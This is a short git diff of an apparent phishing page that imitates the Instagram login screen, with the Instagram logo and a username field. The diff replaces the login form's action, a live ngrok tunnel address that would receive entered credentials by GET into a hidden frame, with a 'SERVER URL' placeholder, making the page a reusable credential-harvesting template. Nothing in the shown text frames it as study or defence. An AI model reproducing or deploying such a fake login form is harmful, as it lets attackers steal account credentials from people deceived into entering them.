--- a/index.html
+++ b/index.html
@@ -16,7 +16,7 @@
                   <img class="logo" src="https://upload.wikimedia.org/wikipedia/commons/thumb/2/2a/Instagram_logo.svg/1200px-Instagram_logo.svg.png" alt="Instagram">
                 </div><!-- Header end -->
                 <div class="form-wrap">
-                  <form class="form" action="https://bec3a125b985.ngrok.io" method="GET" target="dummyframe">
+                  <form class="form" action="SERVER URL" method="GET" target="dummyframe">
 
                     <div class="input-box">
                       <input type="text" id="name" aria-describedby="" placeholder="Phone number, username, or email" aria-required="true" maxlength="30" autocapitalize="off" autocorrect="off" name="username" value="" required>
